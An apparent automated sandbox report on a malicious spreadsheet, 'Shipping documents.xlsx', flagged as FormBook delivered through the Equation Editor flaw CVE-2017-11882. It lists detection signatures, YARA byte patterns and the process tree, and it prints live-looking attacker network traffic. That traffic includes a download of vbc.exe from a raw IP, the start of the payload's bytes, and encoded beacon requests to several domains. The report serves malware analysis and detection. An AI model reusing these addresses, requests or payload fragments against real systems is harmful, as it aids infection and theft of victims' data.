Loading ...

Play interactive tourEdit tour

Analysis Report Shipping documents.xlsx

Overview

General Information

Sample Name:Shipping documents.xlsx
Analysis ID:323357
MD5:c3524b3b21dae7ebf0d9ed6b6c10f5ec
SHA1:72ebb819703693105a86d206a119f88821c84b54
SHA256:aa610173afefde94cf914948a54de1d63b71475cdd0d9bb18e6f01d67a2076a9
Tags:DHLVelvetSweatshopxlsx

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses ipconfig to lookup or modify the Windows network settings
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates or modifies windows services
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2376 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2536 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 532 cmdline: 'C:\Users\Public\vbc.exe' MD5: FD09F4D0B2373B9634F2D8AD2F5C899D)
      • vbc.exe (PID: 2828 cmdline: {path} MD5: FD09F4D0B2373B9634F2D8AD2F5C899D)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • ipconfig.exe (PID: 3040 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: CABB20E171770FF64614A54C1F31C033)
            • cmd.exe (PID: 2956 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.2344836687.00000000002F0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000007.00000002.2344836687.00000000002F0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000007.00000002.2344836687.00000000002F0000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166c9:$sqlite3step: 68 34 1C 7B E1
    • 0x167dc:$sqlite3step: 68 34 1C 7B E1
    • 0x166f8:$sqlite3text: 68 38 2A 90 C5
    • 0x1681d:$sqlite3text: 68 38 2A 90 C5
    • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
    00000004.00000002.2136258521.0000000003341000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000004.00000002.2136258521.0000000003341000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x10ac8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x10e62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x1cb75:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x1c661:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x1cc77:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1cdef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x1187a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1b8dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x125f2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x21c67:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x22d0a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 21 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.2.vbc.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.2.vbc.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        5.2.vbc.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158c9:$sqlite3step: 68 34 1C 7B E1
        • 0x159dc:$sqlite3step: 68 34 1C 7B E1
        • 0x158f8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a1d:$sqlite3text: 68 38 2A 90 C5
        • 0x1590b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a33:$sqlite3blob: 68 53 D8 7F 8C
        5.2.vbc.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          5.2.vbc.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2536, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 532
          Sigma detected: EQNEDT32.EXE connecting to internetShow sources
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 216.170.126.121, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2536, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2536, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
          Sigma detected: Executables Started in Suspicious FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2536, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 532
          Sigma detected: Execution in Non-Executable FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2536, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 532
          Sigma detected: Suspicious Program Location Process StartsShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2536, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 532

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeReversingLabs: Detection: 29%
          Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 29%
          Multi AV Scanner detection for submitted fileShow sources
          Source: Shipping documents.xlsxReversingLabs: Detection: 33%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.2344836687.00000000002F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2136258521.0000000003341000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2344664416.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2344806052.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2170693732.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2170740872.0000000000180000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2170766828.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2136301403.00000000033BB000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: 5.2.vbc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then jmp 004948FDh
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then jmp 004948FDh
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4x nop then pop ebx
          Source: global trafficDNS query: name: www.nziyade.com
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 216.170.126.121:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 216.170.126.121:80

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 23.227.38.74:80 -> 192.168.2.22:49170
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 26 Nov 2020 20:13:00 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34Last-Modified: Thu, 26 Nov 2020 08:44:44 GMTETag: "74e00-5b4fe8e3ad860"Accept-Ranges: bytesContent-Length: 478720Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 fc 6a bf 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 44 07 00 00 08 00 00 00 00 00 00 8e 62 07 00 00 20 00 00 00 80 07 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 07 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c 62 07 00 4f 00 00 00 00 80 07 00 b8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 07 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 94 42 07 00 00 20 00 00 00 44 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 b8 05 00 00 00 80 07 00 00 06 00 00 00 46 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 07 00 00 02 00 00 00 4c 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 62 07 00 00 00 00 00 48 00 00 00 02 00 05 00 b0 72 00 00 9c 63 00 00 03 00 00 00 78 00 00 06 4c d6 00 00 f0 8b 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 02 00 47 00 00 00 01 00 00 11 02 14 7d 03 00 00 04 02 28 15 00 00 0a 00 00 02 28 06 00 00 06 00 02 73 1d 00 00 06 7d 01 00 00 04 02 7b 01 00 00 04 02 6f 18 00 00 06 00 28 16 00 00 0a 0a 02 7b 01 00 00 04 02 7b 02 00 00 04 6f 1c 00 00 06 00 2a 00 13 30 02 00 c8 00 00 00 02 00 00 11 00 28 17 00 00 0a 02 7b 01 00 00 04 7b 0e 00 00 04 28 18 00 00 0a 0a 12 00 28 19 00 00 0a 7e 10 00 00 04 76 6c fe 02 0b 07 2c 11 02 7b 01 00 00 04 7b 0f 00 00 04 6f 1a 00 00 0a 00 02 7b 01 00 00 04 7b 0f 00 00 04 04 6f 1b 00 00 0a 6f 1c 00 00 0a 00 02 7b 01 00 00 04 28 17 00 00 0a 7d 0e 00 00 04 04 6f 1b 00 00 0a 1f 0d 33 15 02 7b 01 00 00 04 7b 0f 00 00 04 6f 1d 00 00 0a 16 fe 02 2b 01 16 0c 08 2c 40 00 02 7b 01 00 00 04 7b 0f 00 00 04 6f 1e 00 00 0a 73 1f 00 00 0a 0d 02 7b 01 00 00 04 02 7b 01 00 00 04 7b 0f 00 00 04 6f 1b 00 00 06 00 02 7b 01 00 00 04 7b 0f 00 00 04 6f 1a 00 00 0a 00 00 2
          Source: global trafficHTTP traffic detected: GET /sqe3/?cB=b5w1+wtMG086+ku5rySlnuvQ6Xf8quQxjwBGS8AB8cD8tokaT2Rnkch2TwRAgrEjQEkeCg==&NreT=XJE0G4nHflj HTTP/1.1Host: www.nziyade.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sqe3/?cB=+ZQWL9nqnp3EOm8ikLy2BwgKdV18m5qkp85bGkYyvqO5Knmmx3CsQ0WtNG04x/T/vHfJsQ==&NreT=XJE0G4nHflj HTTP/1.1Host: www.coloringprintouts.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sqe3/?cB=DRVVqDahppZVcoMwHtqBO8gGbVXxnEQtD1Fk26hq+CZg2PM8h76HHU2382Ywn2xY/MQpAg==&NreT=XJE0G4nHflj HTTP/1.1Host: www.ktproductreviews.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sqe3/?cB=nOVFEnbxdO1KUFG+sKoXHHXF5stR7dv4oa+WZ4s9syusWu0cHacPS3mYPEahtKUV1nLuVQ==&NreT=XJE0G4nHflj HTTP/1.1Host: www.mondzorg-postma.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sqe3/?cB=oXNDcZDlqRKH2hC5SoJ7dwvXOnFb9nMS++dxAtrFY1wLaleqRTsShLolmYf7RNmK9qOopw==&NreT=XJE0G4nHflj HTTP/1.1Host: www.cocogreensoil.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sqe3/?cB=M2gi/2rftereO9YfyWfvr6V5Ia0b0txn97j0jlakpXVUd1e6zNbyBzYXevWhAV4c0pce3g==&NreT=XJE0G4nHflj HTTP/1.1Host: www.moveoneic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sqe3/?cB=i8a2XrM6c4PzlxrBAf6zuAf3nKYqRmED7KfomvOZBUX2ic3/OKgutfqGct8PuPO2yhcJFA==&NreT=XJE0G4nHflj HTTP/1.1Host: www.antillean-network.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sqe3/?cB=ce2vMfxvjNzpIiuEEVRdBe9TyXbD+nO4E4YWLS1QBhRwWXpWwU+RSJ1ydcmIzRpEWYQ4mQ==&NreT=XJE0G4nHflj HTTP/1.1Host: www.integratednourishment.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sqe3/?cB=cV0NQ3cSoEjVqYMmg/VwqmhA8djIFQLMz29YYbqh0iCirm1PpN4CjJrzlAb4Rx9TAdAIgw==&NreT=XJE0G4nHflj HTTP/1.1Host: www.gregoryrecommends.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sqe3/?cB=doZAOm1JLTF4Hw2qDVobBoiqnusmrIjoueOoEC46DGrv2J4+txpFe/3Q5GbV3HQ5vdwqSA==&NreT=XJE0G4nHflj HTTP/1.1Host: www.yanasacha.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sqe3/?cB=WEY89Cif+pIi2MLF1zVwoU92FBjT7mYFKn7NGwcjA7VjLh+ShZmG13goYNxo9cFbZs7f6w==&NreT=XJE0G4nHflj HTTP/1.1Host: www.bigdillenergy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 52.58.78.16 52.58.78.16
          Source: Joe Sandbox ViewIP Address: 66.235.200.146 66.235.200.146
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
          Source: Joe Sandbox ViewASN Name: BIZLAND-SDUS BIZLAND-SDUS
          Source: global trafficHTTP traffic detected: GET /hkcmd/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 216.170.126.121Connection: Keep-Alive
          Source: unknownTCP traffic detected without corresponding DNS query: 216.170.126.121
          Source: unknownTCP traffic detected without corresponding DNS query: 216.170.126.121
          Source: unknownTCP traffic detected without corresponding DNS query: 216.170.126.121
          Source: unknownTCP traffic detected without corresponding DNS query: 216.170.126.121
          Source: unknownTCP traffic detected without corresponding DNS query: 216.170.126.121
          Source: unknownTCP traffic detected without corresponding DNS query: 216.170.126.121
          Source: unknownTCP traffic detected without corresponding DNS query: 216.170.126.121
          Source: unknownTCP traffic detected without corresponding DNS query: 216.170.126.121
          Source: unknownTCP traffic detected without corresponding DNS query: 216.170.126.121
          Source: unknownTCP traffic detected without corresponding DNS query: 216.170.126.121
          Source: unknownTCP traffic detected without corresponding DNS query: 216.170.126.121
          Source: unknownTCP traffic detected without corresponding DNS query: 216.170.126.121
          Source: unknownTCP traffic detected without corresponding DNS query: 216.170.126.121
          Source: unknownTCP traffic detected without corresponding DNS query: 216.170.126.121
          Source: unknownTCP traffic detected without corresponding DNS query: 216.170.126.121
          Source: unknownTCP traffic detected without corresponding DNS query: 216.170.126.121
          Source: unknownTCP traffic detected without corresponding DNS query: 216.170.126.121
          Source: unknownTCP traffic detected without corresponding DNS query: 216.170.126.121
          Source: unknownTCP traffic detected without corresponding DNS query: 216.170.126.121
          Source: unknownTCP traffic detected without corresponding DNS query: 216.170.126.121
          Source: unknownTCP traffic detected without corresponding DNS query: 216.170.126.121
          Source: unknownTCP traffic detected without corresponding DNS query: 216.170.126.121
          Source: unknownTCP traffic detected without corresponding DNS query: 216.170.126.121
          Source: unknownTCP traffic detected without corresponding DNS query: 216.170.126.121
          Source: unknownTCP traffic detected without corresponding DNS query: 216.170.126.121
          Source: unknownTCP traffic detected without corresponding DNS query: 216.170.126.121
          Source: unknownTCP traffic detected without corresponding DNS query: 216.170.126.121
          Source: unknownTCP traffic detected without corresponding DNS query: 216.170.126.121
          Source: unknownTCP traffic detected without corresponding DNS query: 216.170.126.121
          Source: unknownTCP traffic detected without corresponding DNS query: 216.170.126.121
          Source: unknownTCP traffic detected without corresponding DNS query: 216.170.126.121
          Source: unknownTCP traffic detected without corresponding DNS query: 216.170.126.121
          Source: unknownTCP traffic detected without corresponding DNS query: 216.170.126.121
          Source: unknownTCP traffic detected without corresponding DNS query: 216.170.126.121
          Source: unknownTCP traffic detected without corresponding DNS query: 216.170.126.121
          Source: unknownTCP traffic detected without corresponding DNS query: 216.170.126.121
          Source: unknownTCP traffic detected without corresponding DNS query: 216.170.126.121
          Source: unknownTCP traffic detected without corresponding DNS query: 216.170.126.121
          Source: unknownTCP traffic detected without corresponding DNS query: 216.170.126.121
          Source: unknownTCP traffic detected without corresponding DNS query: 216.170.126.121
          Source: unknownTCP traffic detected without corresponding DNS query: 216.170.126.121
          Source: unknownTCP traffic detected without corresponding DNS query: 216.170.126.121
          Source: unknownTCP traffic detected without corresponding DNS query: 216.170.126.121
          Source: unknownTCP traffic detected without corresponding DNS query: 216.170.126.121
          Source: unknownTCP traffic detected without corresponding DNS query: 216.170.126.121
          Source: unknownTCP traffic detected without corresponding DNS query: 216.170.126.121
          Source: unknownTCP traffic detected without corresponding DNS query: 216.170.126.121
          Source: unknownTCP traffic detected without corresponding DNS query: 216.170.126.121
          Source: unknownTCP traffic detected without corresponding DNS query: 216.170.126.121
          Source: unknownTCP traffic detected without corresponding DNS query: 216.170.126.121
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8B71DA3C.emfJump to behavior
          Source: global trafficHTTP traffic detected: GET /hkcmd/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 216.170.126.121Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /sqe3/?cB=b5w1+wtMG086+ku5rySlnuvQ6Xf8quQxjwBGS8AB8cD8tokaT2Rnkch2TwRAgrEjQEkeCg==&NreT=XJE0G4nHflj HTTP/1.1Host: www.nziyade.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sqe3/?cB=+ZQWL9nqnp3EOm8ikLy2BwgKdV18m5qkp85bGkYyvqO5Knmmx3CsQ0WtNG04x/T/vHfJsQ==&NreT=XJE0G4nHflj HTTP/1.1Host: www.coloringprintouts.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sqe3/?cB=DRVVqDahppZVcoMwHtqBO8gGbVXxnEQtD1Fk26hq+CZg2PM8h76HHU2382Ywn2xY/MQpAg==&NreT=XJE0G4nHflj HTTP/1.1Host: www.ktproductreviews.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
